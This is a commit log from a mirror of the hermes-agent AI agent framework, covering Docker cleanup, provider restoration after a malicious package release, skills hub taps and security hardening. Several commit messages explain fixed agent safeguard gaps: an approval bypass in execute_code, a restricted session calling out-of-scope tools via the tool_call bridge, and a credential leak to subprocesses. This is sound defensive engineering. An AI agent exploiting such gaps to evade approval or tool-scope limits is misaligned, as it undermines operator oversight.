hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-07-29 18:46:59 +00:00

Author	SHA1	Message	Date
Brooklyn Nicholson	b86043834f	Merge origin/main into bb/gui Adopt main's web/ dashboard layout (apps/dashboard removed; web/ restored), keep bb/gui's desktop CLI/update workspace handling, and preserve main's mTLS/URL validation MCP changes. Dashboard backend is aligned to main with only the intended STT provider quarantine/ElevenLabs override reapplied.	2026-05-29 20:40:08 -05:00
Teknium	3a2c03061c	fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted (#34841 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted PyPI quarantined mistralai on 2026-05-12 after the malicious 2.4.6 release (Mini Shai-Hulud worm). 2.4.6 has since been removed from the registry and clean releases resumed (2.4.7 2026-05-25, 2.4.8 2026-05-28). This rolls back the blanket runtime ban so Voxtral STT + TTS work again, following the restoration checklist the repo left in pyproject.toml. Verified against the real SDK: 2.4.8 keeps the import path the code uses (from mistralai.client import Mistral) and the audio.transcriptions.complete / audio.speech.complete surfaces. Changes: - pyproject.toml: re-add mistral extra pinned to mistralai==2.4.8; left OUT of [all] per the 2026-05-12 lazy-install policy (one quarantined release must not break fresh installs). uv.lock regenerated. - tools/lazy_deps.py: add stt.mistral / tts.mistral entries so the SDK lazy-installs on first use (matches edge / elevenlabs). - tools/transcription_tools.py: restore explicit-provider gate (_HAS_MISTRAL + key) and auto-detect entry (local>groq>openai>mistral>xai); _transcribe_mistral lazy-installs before import. - tools/tts_tool.py: dispatcher routes back to _generate_mistral_tts; _import_mistral_client lazy-installs the SDK. - hermes_cli/tools_config.py, hermes_cli/web_server.py: un-hide Mistral from the TTS provider picker and dashboard STT options. - hermes_cli/security_advisories.py: KEEP the shai-hulud-2026-05 advisory (module policy forbids removal) — it is scoped to 2.4.6 only, so it still warns anyone with the poisoned build cached and never fires on 2.4.8. Summary note updated to reflect the un-quarantine. - tests: revert the disabled-behavior assertions added by the ban commit back to routing/positive expectations; add mistral to the lazy-installable-extras-excluded-from-[all] contract. Reported by @SkYNewZ (#34503). Validation: 189 targeted STT/TTS/lazy_deps/metadata tests pass; E2E with the real mistralai 2.4.8 SDK routes both STT and TTS to mistral.	2026-05-29 13:24:12 -07:00
Teknium	b6ed3913d2	feat(skills): categorize tap skills from skills.sh.json grouping sidecar A GitHub tap can ship a repo-root skills.sh.json (the published skills.sh schema) declaring category groupings. The Skills Hub now reads it at index time and uses each grouping title as the skill's category label, instead of the tag-derived guess. Generic: any tap that ships the file gets real categorization — NVIDIA's groupings (Inference AI, Decision Optimization, GPU Development, etc.) flow through automatically. - GitHubSource: _get_skillsh_groupings() fetches+caches the sidecar per repo; _parse_skillsh_groupings() flattens it to {skill_name: title}; _list_skills_in_repo() stamps meta.extra['category']; _meta_to_dict now serializes extra so the category survives the index cache round-trip. - extract-skills.py: prefers extra['category'] over the tag heuristic and exempts sidecar categories from the small-category to Other collapse. - Docs + 12 tests.	2026-05-29 12:24:39 -07:00
Teknium	4de8009ce4	feat(skills): integrate NVIDIA/skills as a trusted skills hub tap NVIDIA/skills is now a default trusted tap in the Hermes Skills Hub — discoverable, browsable, searchable, and auto-updating through the same pipeline that already serves OpenAI, Anthropic, and HuggingFace skills. Rebased onto current main.	2026-05-29 12:24:39 -07:00
alt-glitch	0563ab0652	fix(test): add fal_client.submit stub to surface matrix test The plugin switched from fal_client.subscribe() to submit()+handle.get(). The test mock only had subscribe, causing CI failures.	2026-05-29 22:26:24 +05:30
alt-glitch	b6294ea9f1	test(video_gen): cover gateway decision matrix gaps and 4xx error path - Add test for 4xx ValueError with actionable remediation message - Add test for is_available() returning True via managed gateway - Add test for prefers_gateway overriding direct FAL_KEY - Add test for is_available() via gateway in plugin test file	2026-05-29 22:26:24 +05:30
alt-glitch	d04b3c193e	feat(video_gen): route FAL video gen through managed Nous gateway Wire plugins/video_gen/fal/__init__.py to use the same _ManagedFalSyncClient pattern that image gen already uses. Changes: - Add managed gateway resolution, client caching, and _submit_fal_video_request() that routes between direct FAL_KEY and Nous gateway modes - Update is_available() to return True when either FAL_KEY or the managed gateway is reachable - Update generate() to use submit+get handle pattern instead of fal_client.subscribe() directly - Fix happy-horse endpoint namespace: fal-ai/ → alibaba/ (matches the tool-gateway allowlist from fal-video-gen branch) - Surface actionable error on 4xx gateway rejections Tests: - 4 new tests in test_managed_media_gateways.py (gateway routing, client reuse, direct mode fallback, alibaba namespace) - Updated existing test_fal_plugin.py fixture to use submit/handle pattern and patch _resolve_managed_fal_video_gateway for isolation	2026-05-29 22:26:24 +05:30
teknium1	1c53d39eaa	test: deflake process-registry kill + PTY resize tests Two CI flakes surfaced on PR #34572 (both in files this PR doesn't touch; pre-existing host-dependent flakes): 1. test_process_registry::TestPopenLeakOnSetupFailure — the failure-cleanup tests use a fake proc.pid (8888/9999) and assert proc.kill() runs. But spawn_local's primary cleanup is os.killpg(os.getpgid(pid), SIGKILL), falling back to proc.kill() only on ProcessLookupError/PermissionError/ OSError. When the fake PID happens to exist on a busy host, os.getpgid succeeds, os.killpg fires against an UNRELATED real process group, and proc.kill() is never reached -> flaky AssertionError (and a real risk of SIGKILLing an innocent process group from a unit test). Patch os.getpgid to raise ProcessLookupError so the fallback path runs deterministically and no real killpg is ever issued. 2. test_web_server::test_resize_escape_is_forwarded — the receive loop calls the blocking conn.receive_bytes() with no exception guard. Once the child prints its winsize and exits, the PTY closes; on a missed-marker run the next recv blocks until the 30s pytest-timeout instead of failing fast. Add a try/except break (matching the working sibling tests) and bump the child's pre-read sleep 0.15s -> 0.5s so the resize reliably lands first. Verified: 4/4 pass across 3 consecutive runs; root cause for #1 reproduced (os.getpgid(1) succeeds -> old code skips proc.kill).	2026-05-29 04:22:41 -07:00
briandevans	6e179c44b1	fix(web): ensure plugin discovery before web_*_tool registry lookups Web search/extract dispatch read agent.web_search_registry before plugin discovery had run, so in any process that hadn't imported model_tools.py (subprocess agent runs, delegate children, standalone scripts) the registry was empty: get_provider('firecrawl') returned None and the dispatcher emitted the misleading 'No web extract provider configured' error even with web.extract_backend set and FIRECRAWL_API_KEY exported. Adds an idempotent _ensure_web_plugins_loaded() helper (mirrors tools.browser_tool._ensure_browser_plugins_loaded) and calls it at the top of both the web_search_tool and web_extract_tool dispatch sites before the registry lookup. Fixes #27580. Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>	2026-05-29 04:00:00 -07:00
teknium1	c77a697fa4	refactor(vision): consolidate native fast-path gate into one shared helper The fast-path decision (native routing + provider allowlist OR supports_vision override) lived inline in vision_analyze and was copied into browser_vision. Extract it to _should_use_native_vision_fast_path() so both tools share one source of truth. - vision_tools: gate logic now one helper; vision_analyze calls it in 3 lines - browser_tool: thin envelope decoration over the shared helper, not a copy - browser_vision typed Union[str, Dict] to match its real return shape - tests slimmed to target the override path + text-mode-wins invariant	2026-05-29 03:58:56 -07:00
tillfalko	2402ec5e7b	test: extend test coverage to native image routing	2026-05-29 03:58:56 -07:00
teknium1	3171845479	fix(code-exec): make dropped HERMES_* env vars diagnosable in sandbox scrub Follow-up mitigation for the #27303 env-scrub tightening. Dropping the broad HERMES_ prefix in favor of a 4-var operational allowlist is correct hardening, but a sandbox script that imports a repo module reading a non-allowlisted HERMES_* var at import time would otherwise see it silently unset. _scrub_child_env now emits a one-shot debug log naming the dropped non-secret HERMES_* vars and pointing at the env_passthrough opt-in escape hatch. Secret-shaped vars are never named in the log. Tests: dropped vars are logged + env_passthrough named; no log when nothing is dropped; secret vars excluded from the diagnostic.	2026-05-29 03:44:49 -07:00
firefly	4bdae34771	test(code-exec): regression suite for the approval-bypass cluster Cover context+callback propagation and teardown-clears, a source guard that both RPC threads stay wrapped, the check_execute_code_guard decision matrix (isolated backend, headless-local, cron-deny, gateway approve/deny/timeout/missing-notify, smart mode, session-yolo), the env-scrub allowlist/secret rules, and a behavioral test that execute_code() blocks before spawning on denial. Refs #4146, #27303, #30882, #33057	2026-05-29 03:44:49 -07:00
firefly	1083977261	fix(code-exec): restore approval context in execute_code RPC threads + guard entry Wrap both execute_code RPC threads (local UDS + remote file-RPC) with propagate_context_to_thread so gateway sessions no longer fall into check_dangerous_command's non-interactive auto-approve branch and the CLI approval prompt stays reachable. Add check_execute_code_guard: one-shot fail-closed approval of the whole script in gateway/ask/cron-deny before the child spawns (skips isolated backends; command-string built only past the early returns). Drop the broad HERMES_ env passthrough for an explicit operational allowlist plus DSN/WEBHOOK secret substrings, and update the POSIX-equivalence oracle. Refs #4146, #27303, #30882, #33057	2026-05-29 03:44:49 -07:00
teknium1	7427b9d581	fix(tool-search): scope bridge catalog + dispatch to the session's toolsets Tool Search read its catalog from the global registry (get_tool_definitions with no toolset scope = 'start with everything'), so a restricted-toolset session — subagent, kanban worker, curated gateway session — could: 1. tool_search the entire process registry, not just its granted tools, and 2. tool_call any registered plugin/MCP tool it was never given, because registry.dispatch() has no enabled_tools gate for non-execute_code tools. A scoped session (enabled_toolsets=['mcp-github']) reported total_available=26 and successfully invoked an out-of-scope plugin tool via tool_call. Fix: - handle_function_call gains enabled_toolsets/disabled_toolsets; the bridge dispatch scopes get_tool_definitions to them (also stops polluting the process-global _last_resolved_tool_names with out-of-scope tools, which leaked into execute_code's sandbox-tool fallback). - A defense-in-depth gate rejects any tool_call'd name not in the scoped deferrable catalog. - tool_executor's unwrap (both concurrent + sequential paths) enforces the same scope before dispatch, since it unwraps tool_call -> underlying name and bypasses the bridge branch. New _tool_search_scoped_names() helper, cached per-agent on registry generation + toolset scope. - New scoped_deferrable_names() helper in tool_search.py shared by both sites. Tests: 4 new regression tests in TestRegression_ToolsetScoping (scoped catalog, out-of-scope tool_call rejection, no global pollution, helper).	2026-05-29 02:04:12 -07:00
teknium1	369075dc95	feat(tools): progressive tool disclosure for MCP and plugin tools Adds Tool Search, a structured-tools progressive-disclosure layer that replaces MCP and non-core plugin tools in the model-visible tools array with three bridge tools (tool_search / tool_describe / tool_call) when the deferrable surface would consume more than a configurable percentage of the active model's context window. Core Hermes tools are never deferred. Default mode is 'auto' with a 10% context threshold, so small toolsets pay no overhead. Set tools.tool_search.enabled to 'on' to force or 'off' to disable. Design carefully reflects the OpenClaw production failure modes documented in the openclaw-tool-search-report: - Core tools never defer (toolsets._HERMES_CORE_TOOLS). Addresses the 'tools silently missing from isolated cron turns' regression class (openclaw#84141) by construction: there is no code path that can drop a core tool. - Catalog is stateless across turns — rebuilt from the live tool-defs list on every assembly. No session-keyed Map that can drift out of sync with the registry. - tool_call unwraps the bridge call before any hook fires, so plugin pre/post hooks, guardrails, approval flows, and the activity feed all see the underlying tool name, not the bridge (addresses openclaw#85588 and the verbose-mode complaint on openclaw#79823). - The unwrap happens in both the parallel and sequential paths of agent/tool_executor.py and also in handle_function_call, so direct callers (sandboxed code, eval harnesses) are covered too. - Bridge tools cannot invoke each other (recursion guard) and cannot invoke core tools (those must be called directly). - Tools mode only — no JS-sandbox code-mode. Keeps the surface small. - Token estimation via cheap char/4 heuristic; precision isn't needed for the threshold decision. Files: - tools/tool_search.py — new module (BM25 retrieval, classification, threshold gate, bridge dispatch, unwrap helper). - tests/tools/test_tool_search.py — 35 tests including the OpenClaw #84141 regression guard. - model_tools.py — wires assembly into _compute_tool_definitions as the final step, adds skip_tool_search_assembly kwarg so the bridge can see the real catalog, dispatches the three bridge tools. - agent/tool_executor.py — unwraps tool_call in both parallel and sequential parsing loops so checkpointing, guardrails, plugin hooks, and tool-progress callbacks all observe the underlying tool name. - hermes_cli/config.py — DEFAULT_CONFIG['tools']['tool_search'] block. - website/docs/user-guide/features/tool-search.md — user docs. Validation: - 35/35 new tests pass. - Existing tool/registry/model_tools/config/coercion/executor tests (82 + 74 + small adjacents) green. - Live E2E: 20 fake MCP tools registered, get_tool_definitions returns 3 bridges, tool_search returns top 3 hits, tool_describe returns full schema, tool_call dispatches to the real underlying handler and the underlying result is what the model sees. - Reserved-name recursion guard verified live. - Core-tool refusal via tool_call verified live.	2026-05-29 02:04:12 -07:00
teknium1	6bebab4761	fix(security): narrow Bedrock subprocess strip to inference bearer token only Scopes the AWS_SDK subprocess strip down from the full AWS credential chain to just AWS_BEARER_TOKEN_BEDROCK — the only Hermes-managed inference secret (analogous to OPENAI_API_KEY). The general AWS credential chain (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN / AWS_PROFILE / config + role pointers) is intentionally left inheritable. Why: per SECURITY.md §3.2 the local terminal is the user's trusted operator shell. Hard-blocklisting the general chain would (a) regress every user who runs aws/terraform/cdk/boto3 in the agent terminal — not just Bedrock users, since PROVIDER_REGISTRY is iterated unconditionally at import — and (b) be unrecoverable, because env_passthrough.py refuses to re-allow anything in _HERMES_PROVIDER_ENV_BLOCKLIST (GHSA-rhgp-j443-p4rf). The narrow strip closes the reported leak (opencode enumerating the Bedrock catalog off the leaked bearer token) with no capability loss. Keeps zapabob's self-healing auth_type=="aws_sdk" mechanism so any future SDK-cred provider is covered automatically. Tests: bearer token stripped + general chain preserved (no-regression guard), on both the runtime strip path and the blocklist-membership path. Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp>	2026-05-29 01:48:08 -07:00
zapabob	95b5b72404	fix(security): block AWS SDK creds from subprocess env	2026-05-29 01:48:08 -07:00
Ben Barclay	48083211ef	fix(docker): accept PUID/PGID as aliases for HERMES_UID/HERMES_GID (#25872 ) (#34401 ) Salvages #25872 by @konsisumer against current main. NAS users (UGOS, Synology, unRAID) expect the LinuxServer.io PUID/PGID convention and bind-mount /opt/data from a host directory owned by their own UID. Without this alias those vars are silently ignored and the s6-setuidgid drop to UID 10000 leaves the runtime unable to read the volume. HERMES_UID/HERMES_GID still take precedence when both are set. The original PR targeted docker/entrypoint.sh, which is now a 27-line deprecation shim under s6-overlay (the May 2026 rework moved all bootstrap logic to docker/stage2-hook.sh, installed as /etc/cont-init.d/01-hermes-setup). Re-applied the same 2-line alias resolution at the equivalent spot in stage2-hook.sh just before the existing UID/GID remap block. Test was retargeted at docker/stage2-hook.sh; docs hunk adapted to current main's wording ("stage2 hook" + s6-setuidgid, not the obsolete "entrypoint drops via gosu") with the NAS bind-mount example preserved verbatim. Test-first regression verification: reverted just docker/stage2-hook.sh to origin/main and re-ran the new tests. Result: FAILED test_stage2_hook_resolves_puid_pgid_aliases FAILED test_puid_pgid_populate_hermes_uid_gid AssertionError: assert ':' == '1000:10' That's the exact bug shape — PUID=1000 PGID=10 silently ignored, HERMES_UID/HERMES_GID stay empty. With the salvage applied, all 4 tests pass. Closes #25872 Co-authored-by: konsisumer <11262660+konsisumer@users.noreply.github.com>	2026-05-29 16:07:15 +10:00
wysie	a0fc3df878	fix(browser): rewrite Camofox Docker loopback URLs (#25541 ) Co-authored-by: Wysie <wysie@users.noreply.github.com>	2026-05-29 15:43:55 +10:00
Teknium	00b8204cf4	fix: restore side-effect imports in test files (test_kanban_tools, test_command_guards) The previous ruff prune commit removed two categories of test-file imports whose value is the side effect of importing them, not their binding: tests/tools/test_kanban_tools.py — 5 sites `import tools.kanban_tools # ensure registered` The import itself runs tools/kanban_tools.py's @registry.register calls; without it, the kanban tool registry is empty and test_kanban_tools_visible_with_env_var asserts {} != {7 kanban tools}. tests/tools/test_command_guards.py — 1 site `import tools.tirith_security # Ensure the module is importable so we can patch it` The comment names the requirement: keep the bare module reference so subsequent mock.patch("tools.tirith_security.<fn>") calls find a registered submodule. CI failure: test (5) shard, tests/tools/test_kanban_tools.py:58 AssertionError: expected {kanban_*}, got set()	2026-05-28 22:26:25 -07:00
kshitijk4poor	66827f8947	chore: prune unused imports and duplicate import redefinitions Remove unused imports (F401) and duplicate/shadowed import redefinitions (F811) across the codebase using ruff's safe autofixes. No behavioral changes -- imports only. - ~1400 safe autofixes applied across 644 files (net -1072 lines) - __init__.py re-exports preserved (excluded from F401 removal so public re-export surfaces stay intact) - Re-exports that are imported or monkeypatched by tests but look unused in their defining module are kept with explicit # noqa: F401 (gateway/run.py load_dotenv; run_agent re-exports from agent.message_sanitization, agent.context_compressor, agent.retry_utils, agent.prompt_builder, agent.process_bootstrap, agent.codex_responses_adapter) - Unsafe F841 (unused-variable) fixes deliberately skipped -- those can change behavior when the RHS has side effects - ruff lints remain disabled in pyproject.toml (only PLW1514 is selected); this is a one-time cleanup, not a config change Verification: - python -m compileall: clean - pytest --collect-only: all 27161 tests collect (zero import errors) - core entry points import clean (run_agent, model_tools, cli, toolsets, hermes_state, batch_runner, gateway) - static scan: every name any test imports directly from an edited module still resolves	2026-05-28 22:26:25 -07:00
Teknium	a4d8f0f62a	feat(prompt): universal task-completion guidance + local Python toolchain probe (#34340 ) * fix(codex): surface error code in Responses 'failed' status errors When a Codex Responses turn ends with status=failed, the response carries the failure details under `response.error` as `{code, message, param, ...}`. The previous extractor pulled only `message`, so users seeing a rate-limit failure got a bare "Slow down" string indistinguishable from a generic stream truncation; an internal_error with empty message degraded to a dict dump ("{'code': 'internal_error', 'message': ''}"). Extract a `_format_responses_error()` helper that: - prefixes `code` when both code and message are present (e.g. 'rate_limit_exceeded: Slow down') - falls back to the bare `code` when message is empty - accepts both dict and attribute-style payloads (SDK and JSON-RPC paths) - preserves the prior status-only fallback when no error payload exists Apply the same helper at the sibling site in `codex_app_server_session.run_turn()` so codex-CLI subprocess turn failures get the same treatment. Tests: - 8 new unit tests for `_format_responses_error` covering both shapes, empty/missing fields, non-string fields, and the status-only fallback. - 2 regression tests on `_normalize_codex_response` for failed status with and without a code, asserting the exact RuntimeError message. - All 3603 tests in tests/agent/ pass. Adapted from anomalyco/opencode#28757. * feat(prompt): universal task-completion guidance + local Python toolchain probe Two cross-model failure modes get a single-line answer in the cached system prompt. Both gated by config (default on), both add zero overhead when not needed, both verified via real AIAgent prompt builds. ## What changed `TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models. Targets two failure modes observed on a real Sarasota real-estate build task: (1) Opus stopped after writing an 85-byte stub and gave a prose response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed through a PEP-668 wall, then returned fabricated listings instead of admitting the blocker. Both behaviors are model-family-agnostic, so the guidance lives outside the existing tool_use_enforcement gate (~192 tokens, paid once per session via prefix cache). `tools/env_probe.py` — local Python toolchain probe. Detects python3/pip/uv/PEP-668 state and emits ONE short line in the system prompt when something is non-default. Emits NOTHING when the env is clean (zero token cost for normal users). Skipped entirely for remote terminal backends (docker/modal/ssh) — they have their own probe. Example output on a broken environment (the actual case): Python toolchain: python3=3.11.15 (no pip module), python=missing (use python3), pip→python3.12 (mismatch), PEP 668=yes (use venv or uv). ## Config Both flags live under `agent.` in config.yaml, default True: agent: task_completion_guidance: true # universal "finish the job" block environment_probe: true # local Python toolchain hints Neither addition required a `_config_version` bump — deep-merge fills defaults in for existing user configs. ## Validation \| Test surface \| Result \| \|---\|---\| \| tests/tools/test_env_probe.py \| 10/10 pass (probe unit) \| \| tests/run_agent/test_run_agent.py — new classes \| 8/8 pass (integration) \| \| TestToolUseEnforcementConfig \| 17/17 pass (no regression) \| \| TestBuildSystemPrompt \| 9/9 pass (no regression) \| \| TestInvalidateSystemPrompt \| 2/2 pass (no regression) \| \| tests/agent/test_prompt_builder.py \| 124/124 pass (no regression) \| \| tests/hermes_cli/ \| 5662/5662 pass (config defaults) \| \| E2E AIAgent build (broken env) \| Both blocks present, 2,178 chars \| \| E2E AIAgent build (clean env) \| 771-char net overhead, env probe silent \|	2026-05-28 22:26:09 -07:00
Ben Barclay	40fa0c1d19	fix(docker): skip credential/skills/cache mounts when source is invalid (#24490 ) (#34331 ) Salvages #24490 by @liuhao1024 against current main. The Docker daemon will silently auto-create a directory at the host path of any `-v <host>:<container>` bind mount when the host path doesn't exist. In Docker-in-Docker setups (where the outer host's real credential file isn't visible inside the agent's parent container), this leaves a directory at the credential mount source — and the inner `docker run` then refuses to mount a directory over a file destination with exit 125. Add defensive shape guards to all three mount loops in DockerEnvironment.__init__: * credentials (expected: file) — skip + warn on directory or missing * skills (expected: dir) — skip + warn when not a directory * cache (expected: dir) — skip + warn when not a directory Failed mounts surface as WARN logs rather than crashing the container start. Existing well-formed sources mount unchanged. The original PR's branch was on a pre-container-reuse-rework base (May 12) and conflicted with the post-May-28 driver work (label tagging, container reuse, orphan reaper). Reconstructed the same intent on current main; the three guard blocks slot cleanly into `tools/environments/docker.py` around the existing mount loops. Three new tests pinned in `tests/tools/test_docker_environment.py`: directory-source skip, missing-source skip, valid-file mounts. Test- first regression verification: reverted just the production code to `origin/main` and confirmed the new tests fail with `'deleted_token.json' is contained here: /root/.hermes/...` — the fixed code makes them pass. Full file passes (54/54). Closes #24490 Co-authored-by: liuhao1024 <11816344+liuhao1024@users.noreply.github.com>	2026-05-29 14:09:04 +10:00
teknium1	bfecfabd0f	Revert "feat(skills): integrate NVIDIA/skills as a trusted skills hub tap" This reverts commit `9992e32db3`.	2026-05-28 20:39:39 -07:00
liuhao1024	44df52005a	fix(tools): guard Path.home() against PermissionError in has_direct_modal_credentials (#33528 ) When HOME=/root (Docker containers) and the process runs as unprivileged user (hermes, uid 10000), Path.home() / '.modal.toml' raises PermissionError because /root/ is inaccessible. This crashes the dashboard /api/skills endpoint. Catch PermissionError/OSError and treat as 'no config file'. Env vars still take priority (tested). Fixes #33525	2026-05-29 13:35:39 +10:00
Teknium	9992e32db3	feat(skills): integrate NVIDIA/skills as a trusted skills hub tap NVIDIA's verified skills catalog (https://github.com/NVIDIA/skills) ships NVIDIA-signed skills for CUDA-X, AIQ, cuOpt, cuPyNumeric, DeepStream, NeMo, NemoClaw and the Skill Card Generator — each bundle carrying a detached `skill.oms.sig` signature, a governance `skill-card.md`, and `evals/`. The sync pipeline drops any skill missing those artifacts before publishing. Changes: - tools/skills_hub.py: add NVIDIA/skills to GitHubSource.DEFAULT_TAPS so it lights up in `hermes skills browse`, `hermes skills search <q>`, the twice-daily skills-index build, and the docs-site Skills Hub page (https://hermes-agent.nousresearch.com/docs/skills) automatically. - tools/skills_guard.py: add NVIDIA/skills to TRUSTED_REPOS so installs resolve to trust_level="trusted" (looser install policy than community). - website/scripts/extract-skills.py: map the `github` source id to a friendly "NVIDIA" pill label for the docs hub page. - website/src/pages/skills/index.tsx: register the NVIDIA pill (green #76b900) and slot it into SOURCE_ORDER after HuggingFace. - website/docs/user-guide/features/skills.md (+ zh-Hans i18n): document the new default tap and the expanded trusted-repos list. - tests/tools/test_skills_guard.py: assert NVIDIA/skills resolves to "trusted" (including the skills-sh-wrapped form). - tests/tools/test_skills_hub.py: invariant — every TRUSTED_REPOS entry must be reachable via GitHubSource.DEFAULT_TAPS (prevents future trusted repos from being declared but never browseable). Validation: - Live GitHub fetch: `src.fetch('NVIDIA/skills/skills/aiq-deploy')` pulled 17 files including SKILL.md (13 KB), skill-card.md, skill.oms.sig, and the full references/ + evals/ tree. trust_level="trusted". - Live inspect resolved name, description, and trust correctly. - All 193 existing skills_guard + skills_hub tests still pass.	2026-05-28 20:35:13 -07:00
Dusk	c834624f7d	fix(voice): honor PIPEWIRE_REMOTE in PortAudio fallback checks (#33473 )	2026-05-29 13:30:17 +10:00
Ben	2f0f03c40d	fix(docker): cleanup_vm() default honors persist mode (don't kill container on session close) Commit 4 made cleanup_vm() default to force_remove=True, which was wrong: cleanup_vm() is called from AIAgent.close() (TUI session close at tui_gateway/server.py:2991, gateway session teardown at gateway/run.py:3569) and from per-turn cleanup (agent/chat_completion_helpers.py:1517). All three are session-lifecycle events that should honor persist mode, not explicit user-initiated teardown. Ben reported the symptom: container shared between multiple TUI sessions (good) but killed as soon as any session closed (bad). With force_remove=True as the default, every `session.close` JSON-RPC tore down the container. The fix is to flip cleanup_vm()'s force_remove default back to False. The kwarg still exists for future explicit-teardown paths (`/reset`-style flows, "destroy my sandbox" commands) that haven't been wired up yet. Two new unit tests pin the behavior: * `test_cleanup_vm_default_honors_persist_mode` — asserts `cleanup_vm(task_id)` does neither docker stop nor docker rm on a persist-mode container (the regression Ben caught). * `test_cleanup_vm_force_remove_tears_down_persist_container` — asserts the kwarg still flows through the runtime-signature-inspection plumbing to the backend's cleanup(). E2E verified against real Docker (in addition to all 17 existing checks): ✓ Default cleanup_vm() leaves persist-mode container running ✓ cleanup_vm(force_remove=True) removed the container Refs #20561	2026-05-29 11:49:54 +10:00
Ben	5c2170a7c6	fix(docker): persist-mode cleanup is no-op; add force_remove kwarg (#20561 ) The first iteration of this PR did docker stop on every cleanup in persist mode (only skipping docker rm). Ben caught this as contradicting the documented "ONE long-lived container shared across sessions" semantics: stopping the container on every Hermes /quit kills any background processes inside (npm watchers, pytest watchers, long-running scripts) — exactly the case persist mode is supposed to protect. This commit splits the cleanup paths cleanly: * Persist mode (default) — cleanup() is a NO-OP for the container. Container stays running, processes survive, next Hermes process attaches via the existing label probe in ~ms instead of waiting for docker start. Resource reclamation happens via the orphan reaper at next startup (2 × lifetime_seconds threshold), which covers the SIGKILL / OOM / abandoned-laptop cases. * Opt-out mode (persist_across_processes=False) — unchanged: docker stop + docker rm -f on cleanup as before. * Explicit teardown — new cleanup(force_remove=True) kwarg overrides persist mode and tears the container down unconditionally. cleanup_vm(task_id) now defaults to force_remove=True since it's the user-driven reset path (called from AIAgent.close(), /reset-style flows, and the idle reaper's per-turn cleanup). The idle reaper in _cleanup_inactive_envs calls env.cleanup() directly with no kwargs, so idle persist-mode envs are no-op'd — the container survives the in-process pop and the next tool call re-probes via labels. No state leak: _container_id is still cleared on the in-process handle. E2E verified against real Docker: ✓ Container is still running after cleanup() ✓ Background process (sleep loop) survived cleanup() ✓ Filesystem state preserved across cleanup() ✓ In-process container_id cleared (next __init__ will re-probe) ✓ Background process visible from reused env (no docker start happened) ✓ force_remove=True removed the container even in persist mode ✓ cleanup_vm() removed the container (defaults to force_remove=True) Test changes: * Replaces `test_cleanup_with_persist_only_stops_no_rm` with `test_cleanup_with_persist_is_noop_for_container` — asserts neither stop nor rm runs in persist mode, and the in-process handle is cleared so re-probe works. * Adds `test_cleanup_force_remove_stops_and_rms_even_in_persist_mode` — covers the new kwarg. * Updates `test_cleanup_uses_subprocess_run_not_detached_shell` and `test_wait_for_cleanup_after_cleanup_returns_true` to pass `force_remove=True` so they actually exercise the docker code path (default no-op would trivially pass). cleanup_vm() forwards `force_remove` only to backends whose cleanup() accepts the kwarg (currently just DockerEnvironment) via runtime signature inspection — Modal/Daytona/SSH `cleanup()` signatures are unchanged. Refs #20561	2026-05-29 11:49:54 +10:00
Ben	d77d877665	fix(docker): startup orphan reaper for crashed-process containers The cleanup-fix in the previous commit handles the graceful-exit leak: a Hermes process that runs ``atexit`` will now actually wait on the docker stop/rm worker thread, so containers either survive (persist mode) or are fully removed (opt-out mode) by the time the interpreter exits. But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window close. Containers from those exits stay parked with no surviving Python process to reuse or remove them, so they accumulate until the operator intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class — there's no live cleanup() to fix. This commit adds the safety net: a startup orphan reaper that runs once per Hermes process and removes long-Exited hermes-labeled containers that the prior commit couldn't reach. Implementation: * New ``reap_orphan_containers()`` in ``tools/environments/docker.py``. Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional) ``label=hermes-profile=<current>``. Per-container ``docker inspect`` parses ``State.FinishedAt`` (with nanosecond-precision trimming for Python's microsecond-bound ``fromisoformat``); containers older than the threshold get ``docker rm -f``'d. The ``status=exited`` filter is load-bearing — a running container may belong to a sibling Hermes process whose reuse path will pick it up; killing it would crash the sibling mid-command. Single-container failures are logged and the sweep continues to the next candidate. * New ``_maybe_reap_docker_orphans()`` helper in ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for ``env_type == "docker"``. Gated by: - ``terminal.docker_orphan_reaper: true`` (default; opt-out for operators running multiple Hermes processes in the same profile who don't trust the conservative defaults) - ``_docker_orphan_reaper_ran`` module flag with double-checked locking — parallel subagents and RL rollouts don't trigger N concurrent docker ps storms - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own setup) - Profile scoping — a research profile NEVER reaps the default profile's stragglers - Exception swallow — a janitor failure must never block container creation * New config ``terminal.docker_orphan_reaper`` wired through all four config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py, tests/conftest.py) and pinned by ``test_docker_orphan_reaper_is_bridged_everywhere``. Coverage: * 9 new unit tests in test_docker_environment.py — happy path, recent- container sparing, profile scoping, unparseable-timestamp safety, docker-ps-failure handling, partial-failure continuation, nanosecond timestamp parsing, zero-value FinishedAt rejection. * 6 new integration tests in test_docker_orphan_reaper_integration.py — once-per-process gate, disable-flag respected, lifetime doubling with 60s floor, current-profile filter wiring, exception swallow. * 1 new bridge-invariant regression test. Closes #20561 (combined with the two prior commits on this branch).	2026-05-29 11:49:54 +10:00
